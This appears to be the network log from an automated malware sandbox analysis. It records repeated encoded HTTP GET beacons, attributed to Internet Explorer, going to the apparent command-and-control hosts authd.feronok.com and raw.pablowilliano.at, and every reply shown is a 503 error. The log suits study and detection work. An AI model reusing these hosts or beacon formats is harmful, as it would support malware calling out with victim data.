Jun 3, 2021 21:01:15.915235996 CEST	7791	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.4	49819	34.95.62.189	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jun 3, 2021 21:01:27.353782892 CEST	7793	OUT	GET /1nQie4cgyK/6CobqL4Gvl8jR0Ryb/ykQvmHPc_2Bj/I998g1woMmU/tlTJlg0yLjL6kY/_2Fb8SL1e_2Bcy1brJLJ_/2BjovsduMdCqU0x4/GQVR4nMtPLQI34Q/jvoS0v2ZfIuYqB_2F9/H14dXc2_2/Bjq_2BEdNrJJI2sl8dBd/0EXv2jUPwYTVqmYCs_2/BvSZuMChVtYZMZS6DsVwap/yVgW08_2Ff8kL/trSm6I_2/FftLBTNnGuYda0Kts3xBoIq/hS7V_2FgQN/zYOOceAjlTgUyD0tU/GveuM_2F9QKt/Dw_2BirtM_2/B5GjUkddBSdTKK/gGHOev3Y5/fKlghW HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: authd.feronok.com Connection: Keep-Alive
Jun 3, 2021 21:01:27.488559961 CEST	7794	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.4	49821	34.95.62.189	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jun 3, 2021 21:01:27.380574942 CEST	7793	OUT	GET /1rDskZrGyxwYpYn35/qL0_2BW8aSJn/Xmy8O6y_2F1/vAFFg5sXvrqV3E/5sQNlqY_2FlVqYGBdfPFn/U_2FpF45FRVvtng0/CHSrG3ox4kKO6nz/fa8Bk9I48YJ2mibVvx/L_2Bqol7c/tsQwCAooqkWn6gPAbSWl/QD3zhXOtMzYL6Ym04zh/5_2FgybkUk94HZTf6olCIq/9FN98evTn58b0/8CSSre_2/Bu6Ikb6rwvx1DWohv5RLt4o/e_2BWF_2Bc/d5_2Fp_2BgsUfGW3Y/Tgn5X_2Fo_2B/ZZIMFZgAKXa/ZNoVGytLkCHCdG/XBDYst2ree/Zgtmz5W2Tq8P/H HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: authd.feronok.com Connection: Keep-Alive
Jun 3, 2021 21:01:27.516978025 CEST	7794	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.4	49824	34.95.62.189	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jun 3, 2021 21:01:29.952511072 CEST	7796	OUT	GET /ATiL3P87_2FBLJR/BC5BJn8dyTtQ6ffd5W/0yM3sHqjA/PUUhyvXz10qPy3rbOoEV/mxXTz5GEf_2FJ1a_2BK/ZfrLOk2W31qhtbg9JWUwPE/hN5bUcB50eKT_/2BNd8E_2/FZi_2BFfGni4E2JjnbevSKB/8h9tWV54XR/zR1VMEFW8ZFskTIvF/Gph5WUak2QX5/sVOcmn1nNvc/RnK_2B00CLgf0I/K7lgIJJ7sya5Al4fACOfm/BvxQs3fAG6a0MebC/NKtDiZMQRT60IUJ/f0dP0RsUXiNDqIW54v/LL56Tq1vM/s_2FlHH5u86U7q76_2Ft/4GmpUkuUY0whYNq9pWf/DCuUzAdQ/8 HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: authd.feronok.com Connection: Keep-Alive
Jun 3, 2021 21:01:30.089883089 CEST	7796	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.4	49825	34.95.62.189	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jun 3, 2021 21:01:38.796308994 CEST	7797	OUT	GET /tTVUy7Cis4PjZzw3zlK90/992fZ2V2UadpUOjx/ZlFfFNzzz_2BNMC/rw9ORkrACS_2FSnAjs/_2FkBi36_/2BcKHehCiVzJ0ZlxZwUe/L605o3IJbqARL43QjWI/5xKrHdjyff8x2rKCgmO7Mu/SD9GyKc_2FBsi/PnW3TDEt/vmXdCw3sFAveNrYKm6TcRex/ohSiZG5THC/3RxSnoz2RW1R2SJHo/_2BwMcdQnslY/eZbgGLoqDt1/hcHL1ijHz1HAC4/B1wguCo7y8KJKFrVLMood/ADnIvNjKfSqFXvOX/vfzJTRrlv1hKd_2/FiJ_2B9pSc20z1/m HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: authd.feronok.com Connection: Keep-Alive
Jun 3, 2021 21:01:38.931354046 CEST	7798	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.4	49827	34.95.62.189	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jun 3, 2021 21:01:49.892219067 CEST	7799	OUT	GET /V0Zdil_2B8IErAOIy/9Ot8_2B759bg/T54gq_2BJbB/fEKg5_2BdBbLTl/sPD_2B_2FnvdcEMKMRo_2/F5OjjPaAspe7o4IE/EqFxzHwYABNSlAE/lleSQROZ4w0qJdPqAF/2uvD9hc1W/12Vnc8IsQCLFh17B6tDt/cKmqUuBU2BwRALjP8bK/qTWq5ZVsfRFHRSRiWcw9bb/QVGOld7VBpWc2/BxulCusO/edEIsjDQMiIt9Z1TfDqldTW/y_2FZW0fap/KxSo1EYJZ0Ju_2Fb0/HNbtGKevtru9/sVQobl_2Fhi/LbDUGWF1rDaSkY/Bqnt50gbD/FtzmqLc_/2B HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: raw.pablowilliano.at Connection: Keep-Alive
Jun 3, 2021 21:01:50.027240992 CEST	7799	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.4	49829	34.95.62.189	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jun 3, 2021 21:01:50.207803965 CEST	7801	OUT	GET /ds3WDeXoOEmk7Y/QQuMPDNsrQWDpsNbTxUBm/9C_2Ffsfwo9FuQBR/xjorKLEJMlfL0A2/CNDB50xXgmy2p4EWxn/DaMjDghfb/cWK8m8ncHHGRZhGMepDc/nDGGUvCSKIWD73abwqz/PSlYxoNGoul9uvoUM2lkYp/iUEvsJec7I6HC/9f5WLr8u/422hTa5FmMbzsZrrYeL5ZCh/Hr1urRNWuy/StfzJRwO7PFWr_2Ft/9TWK1WqIM09Q/q8nrTS3QqnI/jfRzgUIatEJnmp/MqYnHLVMk2JoJoUVcpg0A/FnIEAZIY/9xBtC9wkdw5/g HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: raw.pablowilliano.at Connection: Keep-Alive
Jun 3, 2021 21:01:50.343338966 CEST	7801	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.4	49831	34.95.62.189	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jun 3, 2021 21:01:51.420593023 CEST	7802	OUT	GET /sX4dtwL7bay/rzZGwpnfzczFz3/LsBuX9huxqt_2FdLEMzat/b0BQWHIzHX0afe_2/FzCUWEL0PZc9lgZ/f8naaH0uh3Zi_2FkoD/wcVz9D_2B/K2spupldujIpl6_2F1IN/JJZEthD_2BqNHOG7vWe/xU83hDn75Y_2F7X6pQsqWS/nSOIIPGElOe7E/yCFiYhwx/d939bK9w5BMC_2FRQXloMhp/DAOEqmyIWw/Kzds0FoPo7LNhBc8B/xBOXP4CWJl3D/MzbHOxNvkUe/vW0lC6SpHq1YUw/_2FL2CiRudBOqo8KHNdva/PDtAk_2BKn3r_2Fw/8rN45Wd5_2BHZeB/mZ8NMbVb5wYhbTA5w/V_2B HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:86.0) Gecko/20100101 Firefox/86.0 Host: raw.pablowilliano.at
Jun 3, 2021 21:01:51.557261944 CEST	7802	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.4	49833	34.95.62.189	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jun 3, 2021 21:02:01.277935028 CEST	7804	OUT	GET /fNUjDf7_2/FCXdH_2BoIzulRdpyRrN/VegwLwgBgX3FZ3e7Kml/JNpfVfiUw9hrvE_2BrMey8/9KmQXXHW4gs3a/9wgniy83/wKdGA8aJWZ5vZIo_2FiHAUb/zP0hJ_2BZH/ieJtaC2qsJk3_2Fow/0ttQYgmKdzve/ExwbYpZnP5c/82RPIPzJe1gOLF/_2BRc7ZeEUGg3SmE1TpuS/gPPWxB_2BjL0KDQa/cEkcJSpFensONz2/JuZCF1CCARKPWeUk_2/FvcrH8CIA/yx05ZSmlcDL9ZKkPz_2F/hnEgW0PJ8VaXmVS3OM5/DCOZcdQW8DmkgDTa3ilYTz/BNbEyiVfi1Qod/CczdZH_2BY/L HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: raw.pablowilliano.at Connection: Keep-Alive
Jun 3, 2021 21:02:01.414328098 CEST	7804	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49786	34.95.62.189	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jun 3, 2021 21:00:22.726501942 CEST	4062	OUT	GET /OH175Zchtr5XCiZumX3nwAg/_2FAbOw7Yf/Z3HrOA2tCuHkK0wx_/2BSl8k36vM_2/BmUwT9vi5ds/IzgeuD6q87gFwZ/84qOsYKFhKxVr6L0Cag3l/PL1RiNFP_2BXA4Cd/ksDe_2BH0hSy4qr/ZjPn7VhnaRpwImnOZ4/d0Piqs_2F/AJoXR13SZzOA0tqrByvJ/vMFrOLoWX0owBj80j0g/nPQR2b2kCMyMldOZ2WWvYd/aoe4QO8ibbCp3/q_2Bre6L/dJzbiZ3n5z4pEwkiyFez6gn/uNwx7h8FiM/chP3D4vmodPyh8n0y/tjNup8GzZEvE/7l7rBmGdOaq/dgKOoGhW3lw/NG HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: raw.pablowilliano.at Connection: Keep-Alive
Jun 3, 2021 21:00:22.861841917 CEST	4063	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49787	34.95.62.189	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jun 3, 2021 21:00:23.109896898 CEST	4063	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: raw.pablowilliano.at Connection: Keep-Alive
Jun 3, 2021 21:00:23.245356083 CEST	4064	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49796	34.95.62.189	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jun 3, 2021 21:00:41.628892899 CEST	6716	OUT	GET /VMv7LJ_2BvHL1lAyBiIjOC/_2B7R5c5uBmVX/X_2BYOAz/c0JLWfH49Nf9MAo_2BDl4xa/R1AF1HMSTQ/bLaP1J1juReG5ZJVb/QYSvbgDFP8oH/ojoQlsq2pc6/TweVpJheh34_2F/PmYm7ijZzpHxG_2Bxq1LR/SrkvKw6i_2BlV4wH/vfhdf5W6RyIgW5h/R0S83XZWkpNINEYVu_/2B9rBv2eE/EjqvPfSEYxpRm4fbT_2B/jA5sIiGntXF7YquHuq2/5rBOQjeRQGS3CD2NKKgqP5/E1Tupr3fdlgcT/n1xpAp_2/Bp4ISropkyZq5kW1zN7S5jV/Sqm_2BC HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: authd.feronok.com Connection: Keep-Alive
Jun 3, 2021 21:00:41.763910055 CEST	6716	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49797	34.95.62.189	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jun 3, 2021 21:00:41.995559931 CEST	6716	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: authd.feronok.com Connection: Keep-Alive
Jun 3, 2021 21:00:42.131381989 CEST	6717	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49798	34.95.62.189	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jun 3, 2021 21:00:45.206887960 CEST	6718	OUT	GET /L_2BDt9ytUk/uJ29Pz3DiT6ki3/08jXqEr2Bw1VZtjZ7PHMr/mkp8mx2j_2Fh_2BM/48r5Iz6Z2h_2Bg7/3c0JHMzi_2Bd8uVzJ5/uGDraFJKA/IFdt67IIK9VJ7zdnK4nw/jNbnNqei800ZG6T1Vpc/m9N_2BygQv60O0G4Ym7L1A/5RXKQGdksp5xa/gXKVe3Ly/cvcBIVxMqI3xDpqjvHjrI2T/TRX0RhYRP1/5D3VV1o_2BBhqpq4S/1RvoBIEOAT_2/BplWcAPb1TV/eEr_2FeuF0l_2F/UZ_2BWtCVxiKVpMWxO9UV/wrN6QXkuuYNbanbv/j5MKthTa8X0o6I4/qwxpZ0TO4/bmuUKh0n HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: authd.feronok.com Connection: Keep-Alive
Jun 3, 2021 21:00:45.341928959 CEST	6718	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49802	34.95.62.189	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jun 3, 2021 21:00:53.028057098 CEST	6863	OUT	GET /dgzEbQ4OdHi6vrZ8TXtj/42P6D_2FQzGJBqjHjxr/k7tYCNr_2BHR8cgUzK_2Bs/fZKbEnCTwoi6R/nQC9OZqH/TGhDZxT_2FcyK4SWqRZQa7w/41mbt7_2B_/2FtBemIRh9CRKakc_/2FaUTf7brC_2/BoPFXB3WUVS/t0M9Y7B5D9tXCb/3vVm2UdQ7QnBcJ_2B5FZY/HKCjwrAvNhkFAJ9S/42tcvlD5WAdpz7b/tfcmR4KwAA0AIq0GqV/1JYJnedpn/6P_2Bdhq8_2FOGrAw5S1/RksGCiQL0vInFpv93x6/GPB7vBf2Ua61U1JKwYMYBT/W_2BMupqR3OLU/3N2FUTT6/mBp5pryRUA_2Bff/j HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: authd.feronok.com Connection: Keep-Alive
Jun 3, 2021 21:00:53.163319111 CEST	6870	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.4	49813	34.95.62.189	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jun 3, 2021 21:01:04.549221992 CEST	7751	OUT	GET /5rrnAaWEJjP00b_2B56737/B1AfZAlhUgHoA/b2t_2BN4/l5OkLy1VlWuDrrdEILRWWeb/E6W61j9yq8/abuhFDsODTcGxVnWQ/E_2BE3e1OTvy/3WD7TSUbyOm/cpm4396P_2Fjd0/pOy7riIEzmJp_2FxZmWLM/gNpof3_2FnlsfWUd/1743QqIgg_2FQRu/ZKVtHnC8C1xvmv_2B8/vHh2F1obc/m3eV0F3yYMczZiknu1Ew/H6Bi_2BTSpyXLXazxZH/wg8NqLvm2lSF1HlaU3pANa/1U6Z_2BZLYJJ_/2BlaNQcq/ledo9CFvcm_2F6MjGWcFo9L/RAKX4mmp_2/F_2FxtA6ZOAujrSBZ/4yu9h7z HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: raw.pablowilliano.at Connection: Keep-Alive
Jun 3, 2021 21:01:04.685482979 CEST	7751	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.4	49814	34.95.62.189	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jun 3, 2021 21:01:04.899730921 CEST	7751	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: raw.pablowilliano.at Connection: Keep-Alive
